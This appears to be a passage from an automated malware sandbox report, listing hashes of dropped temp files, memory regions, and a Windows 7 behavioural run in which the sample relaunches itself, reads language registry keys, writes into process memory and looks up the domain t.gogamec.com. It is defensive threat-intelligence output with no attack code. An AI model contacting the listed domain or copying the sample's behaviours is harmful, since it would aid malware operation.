| SHA256 | ccf0f8d1770436e1cd6cdcfa72d79a791a995a2f11d22bdf2b1e9bfbdd6f4831 |
| SHA512 | 4d094e86e9c7d35231020d97fbcc7d0c2f748d1c22819d1d27dabbb262967800cc326911a7e5f674461d9932e244affe9a01fa9527f53248e5867490e0e09501 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7727e238bcfe2e321072500c68ed0d20 |
| SHA1 | dfb774b29dd1621bb8b24fbcc699bae37002e899 |
| SHA256 | 74d126fa51a276db01dfaf47941be9aea660552c61cd1dfbf43a6159102b72dd |
| SHA512 | 2b09f87dcd1291bc347b07fb325eed7a7d79e79d6c1cf106ef12a5d415ceef84385b3233998de167a6eb0e07e3927da1a31bfc8d0f1eba84d5bdf329b1ab8484 |
C:\Users\Admin\AppData\Local\Temp\ykifDQA.1
| MD5 | 7b25b2318e896fa8f9a99f635c146c9b |
| SHA1 | 10f39c3edb37b848974da0f9c1a5baa7d7f28ee2 |
| SHA256 | 723b3b726b9a7394ac3334df124a2033536b108a8eb87ec69e0a6e022c7dcd89 |
| SHA512 | a3b294e93e9d0a199af21ad50af8290c0e0aaa7487019480ca3ffd75aa8ad51c4d33612ec69275e4fa2273ca5e33fdfdf263bb0ce81ad43ce092147118fa8ca6 |
C:\Users\Admin\AppData\Local\Temp\7TcIneJp.0
| MD5 | 6c83f0423cd52d999b9ad47b78ba0c6a |
| SHA1 | 1f32cbf5fdaca123d32012cbc8cb4165e1474a04 |
| SHA256 | 4d61a69e27c9a8982607ace09f0f507625f79050bdf7143c7fe0701bf1fab8ae |
| SHA512 | e3d1537f4b22ceadfef3b30216b63320b397a179ab9d5f1eb66f93811a2717ee1fb6222989f610acd4c33fae6078c3df510022b5748a4f1d88ebf08c12f9deec |
C:\Users\Admin\AppData\Local\Temp\gUVIl5.SCh
| MD5 | 973c9cf42285ae79a7a0766a1e70def4 |
| SHA1 | 4ab15952cbc69555102f42e290ae87d1d778c418 |
| SHA256 | 7163bfaaaa7adb44e4c272a5480fbd81871412d0dd3ed07a92e0829e68ec2968 |
| SHA512 | 1a062774d3d86c0455f0018f373f9128597b676dead81b1799d2c2f4f2741d32b403027849761251f8389d248466bcd66836e0952675adcd109cc0e950eaec85 |
C:\Users\Admin\AppData\Local\Temp\6h87pfZ.4
| MD5 | 243a3d5a63c4d0f3a18a3d340f50ed8d |
| SHA1 | 4b5d7d91fdc7666d131ef4ed7524bdc1b024a009 |
| SHA256 | 4da1a700d1dd30fa025a3682aa490680099d508a0b64fbdf8bac2f92914628a1 |
| SHA512 | 64cd601f218c7ace06dd62ad41faf58d829b77f221fa444d2e347f52fa03210584f75448416e4910a0bb2058aafb8aaadcc9e9ea5c353cb29c352c23c6532ab1 |
C:\Users\Admin\AppData\Local\Temp\FdKD47Ef.i1
| MD5 | 22e51c0e8d96e09cf8571ef2a4f91cfb |
| SHA1 | 46f3a3ad48c540816c110c67b8eab824ebeec8c1 |
| SHA256 | e296a4b63a6561115cab7809fb27eb85d3db864d59ecbce82b784d52572a83f1 |
| SHA512 | 40e328acf47cbf6754b29b856e6a17e6cc15cf9b11b9e58b267fb26b14d598e71cefa266b43f552d51d81dca712e5024a77ca09fb1535ae54cb8586e8b5ccc7f |
C:\Users\Admin\AppData\Local\Temp\BtDIj1.fYl
| MD5 | d17564f93bb4a4cf11c46726ea1fe74b |
| SHA1 | 84cbff97ff148296bf36898dcf640ad18eb317c9 |
| SHA256 | 96a4ccf3bc2092c2198cad0beb6a6fdc26db7f59bb82bf4e476bbac6fc783ce0 |
| SHA512 | f327cac0e017ebdaa87e1a8ed40d3abfa5a7614250a9759d6ae62f0f7149aa8ee4a26bb74854ef3860ae8911d87b55803d1f4c0fd58d19507ac4b91eebbb48ff |
C:\Users\Admin\AppData\Local\Temp\Q_tW.pL
| MD5 | 40ba2d6fcce0565f8d90055a8fb9975b |
| SHA1 | c7529fea938658e19d238200af795533cba13c5c |
| SHA256 | df403d434bdcc3b3604349310c62ca68718f1388a3d9c6155e026ff685b555b6 |
| SHA512 | fd8dd7936d96952acaba5f96ff6116b17bc79f770b324945ba966b00e6b3ff6c9f6388bd402d3e5ad40d42a37123416fe904a7d15c749585593caecfcf46b816 |
C:\Users\Admin\AppData\Local\Temp\jB946RB.I7A
| MD5 | d4c89c7cabd256ccedd701e27b3fc31a |
| SHA1 | c01e95b983215b9a08c807084185dbd17ccd32aa |
| SHA256 | e7fe376512c6ba9b615d492961ef38a27b14d192b7c9751b75d9004370b5266c |
| SHA512 | 1d3d59c17368f3e264241fc5100971b74487d0bdc0e7902081a332314fdc59e07475f1aaeed17cd2bc1f64c59378ebe1b76e83ea046351d6691c647a60cbb421 |
C:\Users\Admin\AppData\Local\Temp\U56d.r
| MD5 | 4d5164bd007e1af1a6b436b89fc98329 |
| SHA1 | 808e5215729cff6daf37bfcac7af29e8959a7c26 |
| SHA256 | eaeb79cf3f2e99906d1b5f89b92fcb5555117f0a527247b5becbc78cf65cc434 |
| SHA512 | f977ced0b42db76bab7d79d35f6dad56bdbbde527ccde0f8810838d5364b89223f9ec673915ac9b0f595bad7251d3d17d1be479c8ed5bf56c19aac8470a6b668 |
memory/1432-238-0x0000000002280000-0x0000000002482000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\XHnbBPN.0kM
| MD5 | ab06b4a2368530bea1f4a24f7a4042a0 |
| SHA1 | 4d2f5c0c585eca9589b726d17528d2eb7e8da3bf |
| SHA256 | e53029f24e2d1bf07cac3ba80aad1a0cbff995e2cdc1c32cb74a43a5e8f3fe6e |
| SHA512 | 3ad8acdbca7839f7f1c6ce404a767dd8d3cd0d43a8b98100387c5f8e6cf7f5ab6a08fb6a7456a5beea73ab693cbf4e0def91e601d57b1be9dc865de34f65007f |
C:\Users\Admin\AppData\Local\Temp\r6f7sE.I
| MD5 | bd3523387b577979a0d86ff911f97f8b |
| SHA1 | 1f90298142a27ec55118317ee63609664bcecb45 |
| SHA256 | a7e608f98f06260044d545f7279b8f859f7b7af98ac2b2b79a3cd7ac3b2dac36 |
| SHA512 | b37cb8daddb526312f6be439a3cb87fe62b69d44866df708f10eb148455f09f90b0dcee4360c1ae332d3936357fd4c474920aebec5aa8ddb005b617356c3d286 |
memory/1028-242-0x0000000000400000-0x000000000089B000-memory.dmp
memory/1432-246-0x0000000002B20000-0x0000000002BC5000-memory.dmp
memory/1432-250-0x0000000002BD0000-0x0000000002C62000-memory.dmp
memory/1432-247-0x0000000002BD0000-0x0000000002C62000-memory.dmp
memory/4536-252-0x0000000000400000-0x000000000054C000-memory.dmp
memory/1432-251-0x0000000002280000-0x0000000002482000-memory.dmp
memory/4536-253-0x0000000003090000-0x0000000003135000-memory.dmp
memory/4536-257-0x0000000003140000-0x00000000031D2000-memory.dmp
memory/4536-255-0x0000000003140000-0x00000000031D2000-memory.dmp
memory/1908-258-0x0000000000400000-0x000000000054C000-memory.dmp
memory/1908-264-0x0000000003630000-0x00000000036D5000-memory.dmp
memory/1908-269-0x00000000036E0000-0x0000000003772000-memory.dmp
memory/1908-266-0x00000000036E0000-0x0000000003772000-memory.dmp
memory/1432-275-0x0000000002BD0000-0x0000000002C62000-memory.dmp
memory/4536-282-0x0000000003140000-0x00000000031D2000-memory.dmp
memory/2272-287-0x0000000000400000-0x000000000054C000-memory.dmp
memory/1908-288-0x00000000036E0000-0x0000000003772000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20241010-en
Max time kernel
151s
Max time network
160s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe
"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe"
C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe
"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe" -u
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | t.gogamec.com | udp |